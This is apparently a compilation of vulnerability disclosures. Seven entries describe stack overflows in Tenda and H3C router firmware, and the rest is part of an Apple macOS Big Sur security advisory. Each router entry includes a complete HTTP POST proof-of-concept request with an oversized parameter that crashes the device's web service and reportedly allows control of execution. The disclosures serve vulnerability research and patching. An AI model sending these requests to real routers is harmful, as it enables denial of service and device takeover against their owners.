Tenda AC1206 V15.03.06.23 was discovered to contain multiple stack overflows via the deviceMac and the device_id parameters in the function addWifiMacFilter.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the addWifiMacFilter function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the addWifiMacFilter function,the device_mac we entered (the value of deviceMac) and the device_id we entered (the value of deviceId) are formatted with the sprintf function, spliced with %s;%d;%s strings, and saved to mib_value. It is not secure, as long as the size of the data we enter is larger than the size of mib_value, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    deviceMac=a&deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37814: vuln/Tenda/AC1206/14 at main · Darry-lang1/vuln

Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow via the shareSpeed parameter in the function fromSetWifiGusetBasic.

**Tenda AX1803 (V1.0.0.1) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3421.html

**Product Information**

Tenda AX1803 V1.0.0.1, the latest version of simulation overview：

**Vulnerability details**

The Tenda AX1803 (V1.0.0.1) was found to have a stack overflow vulnerability in the fromSetWifiGusetBasic function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromSetWifiGusetBasic function,the nptr (the value of shareSpeed) we entered is directly copied into the v39 array through the strcpy function.It is not secure, as long as the size of the data we enter is larger than the size of v39, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiGuestSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37824: vuln/Tenda/AX1803/5 at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

!\[image-20220720231031268\](D:\\vuln\\H3C\\H3C B5Mini\\5\\img\\image-20220720231031268.png)

In the Asp_SetTimingtimeWifiAndLed function, the V11(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36468: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function, V7(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V11, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 546
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36469: vuln/readme.md at main · Darry-lang1/vuln

H3C Magic NX18 Plus NX18PV100R003 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C Magic NX18 Plus NX18PV100R003 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202103/1389284\_30005\_0.htm

**Product Information**

H3C NX18 Plus NX18PV100R003 router, the latest version of simulation overview：

**Vulnerability details**

The H3C NX18 Plus NX18PV100R003 router was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Asp_SetTimingtimeWifiAndLed function, the param we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V22, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.124.1:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.124.1:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36498: vuln/H3C/H3C NX18 Plus/3 at main · Darry-lang1/vuln

H3C Magic NX18 Plus NX18PV100R003 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C Magic NX18 Plus NX18PV100R003 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202103/1389284\_30005\_0.htm

**Product Information**

H3C NX18 Plus NX18PV100R003 router, the latest version of simulation overview：

**Vulnerability details**

The H3C NX18 Plus NX18PV100R003 router was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function, the param we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.124.1:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.124.1:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36493: vuln/H3C/H3C NX18 Plus/8 at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function, V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36470: vuln/readme.md at main · Darry-lang1/vuln

A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.5, macOS Big Sur 11.6.8, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges.

Released July 20, 2022

**APFS**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access user-sensitive data

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**CoreText**

Available for: macOS Big Sur

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**FaceTime**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to access private information

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-32781: Wojciech Reguła (@\_r3ggi) of SecuRing

**File System Events**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**ICU**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Big Sur

Impact: Processing an image may lead to a denial-of-service

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Kernel**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32815: Xinru Chi of Pangu Lab

CVE-2022-32813: Xinru Chi of Pangu Lab

**libxml2**

Available for: macOS Big Sur

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

